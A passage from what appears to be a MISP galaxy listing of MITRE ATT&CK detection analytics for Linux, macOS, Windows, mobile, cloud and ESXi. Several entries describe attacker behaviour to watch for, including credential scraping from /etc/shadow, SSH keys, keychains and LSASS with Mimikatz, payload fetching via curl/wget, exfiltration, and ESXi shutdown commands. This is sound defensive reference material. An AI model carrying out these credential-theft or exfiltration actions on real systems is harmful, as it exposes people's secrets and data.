UUID 7b0d80c0-807e-46b1-b3f7-fd3e4f3aceba which can be used as unique global reference for Analytic 1613 - AN1613 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1613
mitre_platforms ['Linux']

Analytic 1631 - AN1631

Monitoring adversary access to sensitive process memory via the /proc filesystem to extract credential material, often involving multi-step access to /proc/[pid]/mem or /proc/[pid]/maps combined with privilege escalation or credential scraping binaries.

Internal MISP references

UUID 98b71f96-ae0a-47b4-bec2-156cb6e5bfcb which can be used as unique global reference for Analytic 1631 - AN1631 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1631
mitre_platforms ['Linux']

Analytic 1163 - AN1163

Access of mounted cloud shares or document repositories via browser, terminal, or Finder by users not typically interacting with those resources. Includes script-based enumeration or mass download.

Internal MISP references

UUID eac7b88d-0ee2-4fbf-9e0b-ea73c376ccb3 which can be used as unique global reference for Analytic 1163 - AN1163 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1163
mitre_platforms ['macOS']

Analytic 1361 - AN1361

Monitor for anomalous access to financial applications, browser-based banking sessions, or enterprise ERP systems from Windows endpoints. Detect mass emailing of payment instructions, sudden rule changes in Outlook for financial staff, or use of clipboard data exfiltration tied to cryptocurrency wallet addresses.

Internal MISP references

UUID f2aef85a-c1ea-4d1a-b359-32692c973cdc which can be used as unique global reference for Analytic 1361 - AN1361 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1361
mitre_platforms ['Windows']

Analytic 1136 - AN1136

Abuse of extended attributes (xattrs) to hide payloads in com.apple. or custom keys. Defender perspective: monitor suspicious use of xattr command with -w (write) and -p (print) flags, especially when followed by execution of interpreters like bash, Python, or osascript. Behavior chain includes: (1) suspicious file modification with new com.apple. attributes, (2) attribute content inconsistent with expected metadata tags (e.g., high entropy), (3) subsequent process execution correlated with extraction of the attribute.

Internal MISP references

UUID f5a0dc9d-3dda-4e31-ad4d-0560b918b6b1 which can be used as unique global reference for Analytic 1136 - AN1136 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1136
mitre_platforms ['macOS']

Analytic 1317 - AN1317

Cause→effect chain in CI/dev desktops: (1) user triggers container run/pull after opening a doc/link/script, (2) newly created image/container uses unexpected external registry or entrypoint, (3) container starts and immediately egresses to suspicious destinations.

Internal MISP references

UUID 3a6fdd1a-59c6-4f46-a761-0de502229da0 which can be used as unique global reference for Analytic 1317 - AN1317 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1317
mitre_platforms ['Containers']

Analytic 1137 - AN1137

Detects anomalous usage of local accounts to log into a system, especially accounts not typically used interactively or outside business hours.

Internal MISP references

UUID 9c53e92a-3659-4137-881a-f4002af9c688 which can be used as unique global reference for Analytic 1137 - AN1137 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1137
mitre_platforms ['Windows']

Analytic 1173 - AN1173

Detects internal hosts generating large outbound FTP/TFTP/SMB sessions to external IPs, or file transfers using non-standard ports and application mismatches (e.g., FTP over port 80).

Internal MISP references

UUID 9c5ef78d-2e02-4201-ba38-ec858e8b6a6f which can be used as unique global reference for Analytic 1173 - AN1173 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1173
mitre_platforms ['Network Devices']

Analytic 1371 - AN1371

Detection of adversary disabling endpoint security tools by unloading launch agents/daemons, modifying configuration profiles, or using security/uninstall commands to remove agents.

Internal MISP references

UUID 9e9a5111-038b-4c68-a8bc-6d094723def4 which can be used as unique global reference for Analytic 1371 - AN1371 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1371
mitre_platforms ['macOS']

Analytic 1713 - AN1713

Unexpected loss of radio signal could indicate that a device is being actively jammed.

Internal MISP references

UUID bfbe9c72-f373-4d03-a08a-1448f31dd92f which can be used as unique global reference for Analytic 1713 - AN1713 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1713
mitre_platforms ['Android']

Analytic 1731 - AN1731

Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.

Internal MISP references

UUID d5926b94-833c-4b29-b611-059f72fcda84 which can be used as unique global reference for Analytic 1731 - AN1731 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1731
mitre_platforms ['Android']

Analytic 1183 - AN1183

Access to shell history or GUI input state (xdotool, xinput) for presence validation prior to payload execution.

Internal MISP references

UUID 21773356-1c94-4edc-b368-008c86a5929e which can be used as unique global reference for Analytic 1183 - AN1183 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1183
mitre_platforms ['Linux']

Analytic 1138 - AN1138

Detects interactive or service logins from local accounts outside expected operational context or at anomalous times.

Internal MISP references

UUID 269f36b6-77fa-4959-9e63-e30036c991d7 which can be used as unique global reference for Analytic 1138 - AN1138 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1138
mitre_platforms ['Linux']

Analytic 1381 - AN1381

Detects compilation activity using csc.exe, ilasm.exe, or msbuild.exe initiated by user-space processes outside typical development environments, followed by execution or network activity from newly written binaries.

Internal MISP references

UUID 3cd889a5-7955-4d38-a49b-89e8d276ceab which can be used as unique global reference for Analytic 1381 - AN1381 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1381
mitre_platforms ['Windows']

Analytic 1318 - AN1318

Cause→effect chain in cloud consoles: (1) user clicks link then invokes instance/image creation via API, (2) instance/image originates from external AMI or unknown image, (3) instance immediately egresses or retrieves payloads.

Internal MISP references

UUID e707cd33-8e20-4b1d-ad3f-fd3a3233fcdd which can be used as unique global reference for Analytic 1318 - AN1318 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1318
mitre_platforms ['IaaS']

Analytic 1831 - AN1831

Application vetting services could look for usage of the READ_PRIVILEGED_PHONE_STATE Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.

Internal MISP references

UUID 4708044d-651a-40c7-a1b2-6d7f13d17d7d which can be used as unique global reference for Analytic 1831 - AN1831 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1831
mitre_platforms ['Android']

Analytic 1813 - AN1813

Exfiltration Over Alternative Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID f42dbde8-e7a0-41ed-b13c-7ade678fa782 which can be used as unique global reference for Analytic 1813 - AN1813 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1813
mitre_platforms ['Android']

Analytic 1193 - AN1193

Processes accessing raw logical drives (e.g., \\.\C:) to bypass file system protections or directly manipulate data structures.

Internal MISP references

UUID 126a43e3-7b39-4312-ba15-aab0f7ce78f9 which can be used as unique global reference for Analytic 1193 - AN1193 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1193
mitre_platforms ['Windows']

Analytic 1319 - AN1319

Modification of COR_PROFILER-related environment variables or Registry keys (COR_ENABLE_PROFILING, COR_PROFILER, COR_PROFILER_PATH), combined with anomalous .NET process creation or unmanaged DLL loads. Defender observes registry modifications, suspicious process creation with altered environment variables, and profiler DLLs loaded unexpectedly into .NET CLR processes.

Internal MISP references

UUID 39d115fc-5e7b-423f-94da-a3b4242e07b8 which can be used as unique global reference for Analytic 1319 - AN1319 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1319
mitre_platforms ['Windows']

Analytic 1391 - AN1391

Detects symmetric key-based encryption operations (e.g., AES via Python, AppleScript, or OpenSSL) followed by unusual outbound connections from non-browser applications or scripted tools.

Internal MISP references

UUID bcab4073-2316-4685-be6c-fb5ab92b22be which can be used as unique global reference for Analytic 1391 - AN1391 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1391
mitre_platforms ['macOS']

Analytic 1139 - AN1139

Detects abnormal or rare logins via local accounts through system or remote mechanisms such as SSH.

Internal MISP references

UUID d6288db6-ff55-4720-b0ee-7aca3e65cc72 which can be used as unique global reference for Analytic 1139 - AN1139 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1139
mitre_platforms ['macOS']

Analytic 1414 - AN1414

Detects staged file access (e.g., archive or obfuscation), followed by an encrypted outbound connection (TLS/HTTPS) from unusual processes such as curl/wget, Python scripts, or custom binaries.

Internal MISP references

UUID a2309590-988e-4116-85e6-59bfc5357726 which can be used as unique global reference for Analytic 1414 - AN1414 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1414
mitre_platforms ['Linux']

Analytic 1441 - AN1441

Detects GUI-based credential prompts invoked via zenity/kdialog/dialog or X11 APIs from non-user-facing scripts or background shell sessions, often with authentication-related text.

Internal MISP references

UUID c4ff3b74-bba1-4129-b246-50213e77336d which can be used as unique global reference for Analytic 1441 - AN1441 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1441
mitre_platforms ['Linux']

Analytic 1144 - AN1144

Detects anomalous NTLM LogonType 3 authentications that occur without accompanying domain logon events, especially from lateral systems or involving built-in administrative tools. Monitors for mismatches between source user context and system being accessed. Correlates LogonSession creation, NTLM authentications, and process/service initiation to identify suspicious use of stolen password hashes for remote access or service logon without password entry. Detects overpass-the-hash by combining Kerberos ticket issuance with NTLM-based lateral movement.

Internal MISP references

UUID d1bcc6a4-e84a-4251-b86b-e8fe2ecc0dd1 which can be used as unique global reference for Analytic 1144 - AN1144 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1144
mitre_platforms ['Windows']

Analytic 1514 - AN1514

Abnormal API calls from user accounts invoking file upload endpoints outside normal baselines (M365, Google Drive, Box). Defender perspective: monitor unified audit logs for elevated frequency of Upload, Create, or Copy operations from compromised accounts.

Internal MISP references

UUID 177bb119-93cc-4319-b9a7-e8d308d958c4 which can be used as unique global reference for Analytic 1514 - AN1514 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1514
mitre_platforms ['SaaS']

Analytic 1154 - AN1154

Reading of sensitive files like .bash_history, /etc/shadow, or private key directories by unauthorized users or unusual processes.

Internal MISP references

UUID 27213df4-c761-4745-b8ef-f91a46966eb9 which can be used as unique global reference for Analytic 1154 - AN1154 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1154
mitre_platforms ['Linux']

Analytic 1415 - AN1415

Detects abnormal encrypted network connections (via TLS/HTTPS) initiated by non-browser binaries, particularly after sensitive file access or compression events.

Internal MISP references

UUID 46585379-5be9-4ce0-9178-c3492f539e11 which can be used as unique global reference for Analytic 1415 - AN1415 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1415
mitre_platforms ['macOS']

Analytic 1145 - AN1145

Monitoring of file access to network shares (e.g., C$, Admin$) followed by unusual read or copy operations by processes not typically associated with such activity (e.g., PowerShell, certutil).

Internal MISP references

UUID 72ba4979-f786-4205-a5da-90874e12813f which can be used as unique global reference for Analytic 1145 - AN1145 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1145
mitre_platforms ['Windows']

Analytic 1451 - AN1451

Crafted ‘synful knock’ patterns toward routers/switches (same src hits interface/broadcast/network address on same port in short order) followed by ACL/telnet/SSH enablement or module change. Detect device image/ACL updates then a new mgmt session.

Internal MISP references

UUID ac933d77-bdb6-45ed-8fb5-87bae6f225cb which can be used as unique global reference for Analytic 1451 - AN1451 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1451
mitre_platforms ['Network Devices']

Analytic 1541 - AN1541

Detect commands such as 'esxcli system shutdown' or 'vim-cmd vmsvc/power.shutdown' executed outside of maintenance windows or via unusual users. Reboot logs in hostd.log and shell logs should be correlated.

Internal MISP references

UUID d076faf3-c5bd-4e5c-93a5-8408c9e80fe1 which can be used as unique global reference for Analytic 1541 - AN1541 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1541
mitre_platforms ['ESXi']

Analytic 1641 - AN1641

Detection of suspicious access to password manager processes (KeePass, 1Password, LastPass, Bitwarden) through abnormal process injection, memory reads, or command-line usage of vault-related DLLs. Correlates process creation with OS API calls and file access to vault databases (.kdbx, .opvault, .ldb).

Internal MISP references

UUID 18ab8a54-68bc-4d43-884d-2b9284eb723e which can be used as unique global reference for Analytic 1641 - AN1641 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1641
mitre_platforms ['Windows']

Analytic 1416 - AN1416

Detects unexpected encrypted outbound connections from management components or guest VMs using TLS, particularly after data volume spikes or script-based orchestration from within guest environments.

Internal MISP references

UUID 20ecf7be-864a-4ae0-be66-cf26ffa9a217 which can be used as unique global reference for Analytic 1416 - AN1416 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1416
mitre_platforms ['ESXi']

Analytic 1614 - AN1614

Detection of user account enumeration through tools like dscl, dscacheutil, or loginshell enumeration via command-line.

Internal MISP references

UUID 24aa5ee9-ba7f-4991-b32a-27d40ee2d010 which can be used as unique global reference for Analytic 1614 - AN1614 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1614
mitre_platforms ['macOS']

Analytic 1146 - AN1146

Unusual access or copying of files from mounted network drives (e.g., NFS, CIFS/SMB) by user shells or scripts followed by large data transfer.

Internal MISP references

UUID 2d1d5482-b82b-45ff-9563-959766d373ff which can be used as unique global reference for Analytic 1146 - AN1146 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1146
mitre_platforms ['Linux']

Analytic 1164 - AN1164

Detects AppleScript execution via 'osascript', NSAppleScript/OSAScript APIs, and abnormal application control events across user sessions. Focuses on causal chains such as osascript spawning child processes, script-induced keystrokes, or API-backed dialog spoofing.

Internal MISP references

UUID a67ac8ec-2748-4fe6-8dd7-bd570af1e104 which can be used as unique global reference for Analytic 1164 - AN1164 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1164
mitre_platforms ['macOS']

Analytic 1461 - AN1461

Execution of files containing right-to-left override characters (U+202E) to masquerade true file extensions. Often found in phishing payloads or file downloads.

Internal MISP references

UUID fb330f70-f0f4-4a5b-9b91-37d29a097a4c which can be used as unique global reference for Analytic 1461 - AN1461 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1461
mitre_platforms ['Windows']

Analytic 1417 - AN1417

Detects adversary behavior accessing Windows cached domain credential files using tools like Mimikatz, reg.exe, or PowerShell, often combined with registry exports or LSASS memory scraping.

Internal MISP references

UUID 18ba26d6-08e0-4370-8ef0-b2dd73bfe0b3 which can be used as unique global reference for Analytic 1417 - AN1417 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1417
mitre_platforms ['Windows']

Analytic 1174 - AN1174

Monitor command execution of powercfg.exe with arguments modifying sleep, hibernate, or display timeouts. Abnormal or repeated modifications to power settings outside administrative baselines may indicate persistence attempts. Correlate process creation with registry and system configuration changes to build behavioral chains.

Internal MISP references

UUID 3234a537-0ad5-449f-87f4-25fd949c97e7 which can be used as unique global reference for Analytic 1174 - AN1174 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1174
mitre_platforms ['Windows']

Analytic 1147 - AN1147

Detection of file access from mounted SMB shares followed by copy or exfil commands from Terminal or script interpreter processes.

Internal MISP references

UUID 67ca77c9-074f-4c93-9592-cabe9ba8a831 which can be used as unique global reference for Analytic 1147 - AN1147 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1147
mitre_platforms ['macOS']

Analytic 1471 - AN1471

Credential-related configuration changes in productivity apps, such as API key creation in Google Workspace, app tokens in Slack, or user-level OAuth credentials in M365.

Internal MISP references

UUID 7a9088cb-cfe8-4a4a-979c-1ef7678179f2 which can be used as unique global reference for Analytic 1471 - AN1471 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1471
mitre_platforms ['SaaS']

Analytic 1714 - AN1714

Unexpected loss of radio signal could indicate that a device is being actively jammed.

Internal MISP references

UUID 1e8d1470-1e76-4f6f-b2c9-633800c4478a which can be used as unique global reference for Analytic 1714 - AN1714 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1714
mitre_platforms ['iOS']

Analytic 1741 - AN1741

Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running and newly created processes and their parameters, potentially detecting unwanted or malicious shells. Application vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)

Internal MISP references

UUID a4242809-30bc-4c00-b247-b6cc11644a07 which can be used as unique global reference for Analytic 1741 - AN1741 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1741
mitre_platforms ['Android']

Analytic 1418 - AN1418

Detects access to SSSD or Quest VAS cached credential databases using tdbdump or other file access patterns, requiring sudo/root access.

Internal MISP references

UUID 26940057-e464-49f9-8f76-ceaca4b9d982 which can be used as unique global reference for Analytic 1418 - AN1418 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1418
mitre_platforms ['Linux']

Analytic 1481 - AN1481

1) Package manager or curl/wget installs/upgrades from non-approved repos or unsigned packages; 2) new ELF written into PATH directories or replacement of existing binaries/libraries; 3) first run leads to unexpected child processes or outbound connections.

Internal MISP references

UUID 86f2dfd5-7073-4178-8c83-8628ecf087d4 which can be used as unique global reference for Analytic 1481 - AN1481 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1481
mitre_platforms ['Linux']

Analytic 1148 - AN1148

Monitor DNS queries, proxy logs, and user-agent strings for anomalous patterns associated with adversary attempts to hide infrastructure. Defenders may observe DNS resolutions to short-lived domains, abnormal WHOIS registration data, or filtering of known defensive/responder IP addresses.

Internal MISP references

UUID 9311924d-7d8f-489a-8105-058a60f572fc which can be used as unique global reference for Analytic 1148 - AN1148 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1148
mitre_platforms ['Windows']

Analytic 1184 - AN1184

API usage or filesystem access revealing user state or browser artifacts (e.g., Safari bookmarks, CGEventState).

Internal MISP references

UUID e3a0ea8d-0018-4603-912a-4d40d0f75390 which can be used as unique global reference for Analytic 1184 - AN1184 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1184
mitre_platforms ['macOS']

Analytic 1814 - AN1814

Exfiltration Over Alternative Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 114cd15c-a02f-4bac-8ed3-3ae71c1761ec which can be used as unique global reference for Analytic 1814 - AN1814 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1814
mitre_platforms ['iOS']

Analytic 1841 - AN1841

Accessing data from the local system can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID b7b70725-f1d8-4fad-8fc4-fc1b9cbf77ef which can be used as unique global reference for Analytic 1841 - AN1841 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1841
mitre_platforms ['iOS']

Analytic 1491 - AN1491

Persistent or background daemons (e.g., plist or launchd jobs) spawning high-CPU processes like xmrig or cpuminer. Outbound encrypted traffic to IPs/domains commonly used by mining proxies.

Internal MISP references

UUID 57595eb2-4d20-4d99-86b3-82064b3566cf which can be used as unique global reference for Analytic 1491 - AN1491 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1491
mitre_platforms ['macOS']

Analytic 1941 - AN1941

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 888e8587-e490-4509-9226-e72b32466618 which can be used as unique global reference for Analytic 1941 - AN1941 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1941
mitre_platforms ['PRE']

Analytic 1194 - AN1194

CLI or automated utilities accessing raw device volumes or flash storage directly (e.g., via copy flash:, format, or partition commands).

Internal MISP references

UUID 892f06ae-6a95-438b-8219-49b3384a4d24 which can be used as unique global reference for Analytic 1194 - AN1194 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1194
mitre_platforms ['Network Devices']

Analytic 1419 - AN1419

Detects exploitation attempts targeting vulnerable kernel drivers or OS components, often followed by unusual process or token behavior.

Internal MISP references

UUID b01d212c-112a-47fb-8883-78bb623ee34b which can be used as unique global reference for Analytic 1419 - AN1419 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1419
mitre_platforms ['Windows']

Analytic 1149 - AN1149

Detect adversaries filtering traffic or modifying server responses to evade scanning. Monitor iptables, nftables, or proxy configurations that deny or redirect requests from known scanning agents or defensive tools.

Internal MISP references

UUID c71bf861-9b5a-4f39-a53f-bb6f45f7a971 which can be used as unique global reference for Analytic 1149 - AN1149 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1149
mitre_platforms ['Linux']

Analytic 1155 - AN1155

Unusual access to ~/Library/Keychains, ~/.bash_history, or Terminal command history by unauthorized processes or users.

Internal MISP references

UUID 49897e8e-8d14-4fcb-b305-328d44e58f35 which can be used as unique global reference for Analytic 1155 - AN1155 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1155
mitre_platforms ['macOS']

Analytic 1551 - AN1551

Windows environmental validation behavioral chain: (1) Rapid system discovery reconnaissance through WMI queries, registry enumeration, and network share discovery, (2) Environment-specific artifact collection (hostname, domain, IP addresses, installed software, hardware identifiers), (3) Cryptographic operations or conditional logic based on collected environmental values, (4) Selective payload execution contingent on environmental validation results, (5) Temporal correlation between discovery activities and subsequent execution or network communication.

Internal MISP references

UUID 8089daf3-72b0-4714-b800-2856f27dc21c which can be used as unique global reference for Analytic 1551 - AN1551 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1551
mitre_platforms ['Windows']

Analytic 1515 - AN1515

ESXi guest OS or management interface processes establishing unexpected external HTTPS connections. Defender perspective: monitor vmx or hostd processes making outbound web requests with significant data transfer.

Internal MISP references

UUID f1f23910-7ecd-498b-92e8-7b5aa0d53ac8 which can be used as unique global reference for Analytic 1515 - AN1515 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1515
mitre_platforms ['ESXi']

Analytic 1165 - AN1165

Repeated invocation of high-resource application endpoints or GUI components causing CPU and memory spikes, logged as elevated request volumes, prolonged handle locks, or frequent crash recoveries.

Internal MISP references

UUID 0b514d96-12ce-41e2-b870-b35933d7faa6 which can be used as unique global reference for Analytic 1165 - AN1165 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1165
mitre_platforms ['Windows']

Analytic 1156 - AN1156

Unusual web-based access or API scraping of password managers, single sign-on sessions, or credential sync services via browser automation or anomalous API tokens.

Internal MISP references

UUID 0ec40b2f-4969-443f-bad5-4bc6239fec29 which can be used as unique global reference for Analytic 1156 - AN1156 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1156
mitre_platforms ['SaaS']

Analytic 1615 - AN1615

Detection of API calls listing users, IAM roles, or groups in cloud environments.

Internal MISP references

UUID 5d7158ce-17f5-4643-bde2-c0a4f2ba0b73 which can be used as unique global reference for Analytic 1615 - AN1615 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1615
mitre_platforms ['IaaS']

Analytic 1561 - AN1561

Registry access to system language keys (e.g., HKLM\SYSTEM\CurrentControlSet\Control\Nls\Language) or suspicious processes invoking locale-related APIs (e.g., GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList). Defender visibility focuses on anomalous or non-standard processes issuing these queries, especially when run by unknown binaries or scripts.

Internal MISP references

UUID b8685b0b-f96e-41a4-8e01-eec252756447 which can be used as unique global reference for Analytic 1561 - AN1561 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1561
mitre_platforms ['Windows']

Analytic 1516 - AN1516

A process (non-system or user-initiated) accesses private key files in user profile paths or system certificate stores followed by potential network connections or compression activity.

Internal MISP references

UUID eb569d45-a5b6-47df-a098-bdb26ef0597f which can be used as unique global reference for Analytic 1516 - AN1516 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1516
mitre_platforms ['Windows']

Analytic 1651 - AN1651

Application vetting services could look for android.permission.READ_CALL_LOG in an Android application’s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. On Android, the user can manage which applications have permission to access the call log through the device settings screen, revoking the permission if necessary.

Internal MISP references

UUID 9cd8928d-a26d-42c0-8a23-0b10816c5d21 which can be used as unique global reference for Analytic 1651 - AN1651 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1651
mitre_platforms ['iOS']

Analytic 1517 - AN1517

User or script-based access to ~/.ssh or other directories containing private keys followed by unusual shell activity or network connections.

Internal MISP references

UUID 3577f79d-0891-451b-a861-1a03a3688a93 which can be used as unique global reference for Analytic 1517 - AN1517 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1517
mitre_platforms ['Linux']

Analytic 1157 - AN1157

Unauthorized API or console calls to retrieve or reset password credentials, download key material, or modify SSO settings.

Internal MISP references

UUID 3e30007c-fc51-447f-850a-c8378427be3d which can be used as unique global reference for Analytic 1157 - AN1157 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1157
mitre_platforms ['Identity Provider']

Analytic 1571 - AN1571

Unusual processes (e.g., powershell.exe, excel.exe) accessing large local files and subsequently initiating HTTPS POST requests to domains associated with cloud storage services (e.g., dropbox.com, drive.google.com, box.com). Defender perspective: correlation between file reads in sensitive directories and high outbound traffic volume to known storage APIs.

Internal MISP references

UUID a74c34c2-f4bf-4bd0-9f23-7c04c45b93ca which can be used as unique global reference for Analytic 1571 - AN1571 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1571
mitre_platforms ['Windows']

Analytic 1175 - AN1175

Detect execution of system utilities (systemctl, systemd-inhibit, systemd-sleep) modifying sleep or hibernate behavior. Abnormal edits to system configuration files (e.g., /etc/systemd/sleep.conf) should be correlated with process execution to identify persistence techniques.

Internal MISP references

UUID e3bbe2c4-615d-4847-93dc-b5857fc1b384 which can be used as unique global reference for Analytic 1175 - AN1175 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1175
mitre_platforms ['Linux']

Analytic 1751 - AN1751

Application vetting services can look for applications requesting the android.permission.BIND_ACCESSIBILITY_SERVICE permission in a service declaration. On Android, the user can view and manage which applications can use accessibility services through the device settings in Accessibility. The exact device settings menu locations may vary between operating system versions. On Android, the user can view and manage which applications have third-party keyboard access through the device settings in System -> Languages & input -> Virtual keyboard. On iOS, the user can view and manage which applications have third-party keyboard access through the device settings in General -> Keyboard.

Internal MISP references

UUID 8c29fa0f-6b35-40c2-9c99-081a0997db86 which can be used as unique global reference for Analytic 1751 - AN1751 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1751
mitre_platforms ['Android']

Analytic 1715 - AN1715

Application vetting services could potentially detect the usage of APIs intended for artifact hiding. The user can examine the list of all installed applications in the device settings.

Internal MISP references

UUID 964fc2e0-96fc-4992-b89a-8101d47b7d8c which can be used as unique global reference for Analytic 1715 - AN1715 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1715
mitre_platforms ['Android']

Analytic 1158 - AN1158

Access to container image layers or mounted secrets (e.g., Docker secrets) by processes not tied to entrypoint or orchestration context.

Internal MISP references

UUID 1a68a39c-c4e3-4ff1-88f5-db78575ce15e which can be used as unique global reference for Analytic 1158 - AN1158 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1158
mitre_platforms ['Containers']

Analytic 1581 - AN1581

Detects user activity that shares or syncs files with external domains via link generation, OneDrive external sharing, or file transfer actions involving non-whitelisted partner tenants.

Internal MISP references

UUID 60b2d6f4-1bf0-4c52-8923-ac8e3b8088d4 which can be used as unique global reference for Analytic 1581 - AN1581 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1581
mitre_platforms ['Office Suite']

Analytic 1518 - AN1518

Access to user private key directories (e.g., /Users/*/.ssh) via Terminal, scripting engines, or non-default processes.

Internal MISP references

UUID d7a9c7c8-81a0-4988-9617-51f191ab32c8 which can be used as unique global reference for Analytic 1518 - AN1518 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1518
mitre_platforms ['macOS']

Analytic 1185 - AN1185

Detection focuses on abnormal service executions initiated via service control manager APIs, sc.exe, net.exe, or PsExec creating temporary services. Defenders observe process creation of services.exe spawning non-standard binaries, registry changes in service keys followed by rapid execution, and network connections originating from processes tied to transient services. Correlation across process lineage, registry activity, and service logs provides strong signals of malicious service execution.

Internal MISP references

UUID fedc5a7d-4ea9-4dd7-b2e0-3f10549d90db which can be used as unique global reference for Analytic 1185 - AN1185 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
